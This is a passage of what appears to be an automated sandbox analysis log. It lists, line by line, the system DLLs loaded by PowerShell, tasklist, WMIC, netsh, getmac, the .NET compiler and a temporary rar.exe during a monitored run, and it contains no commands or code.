              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
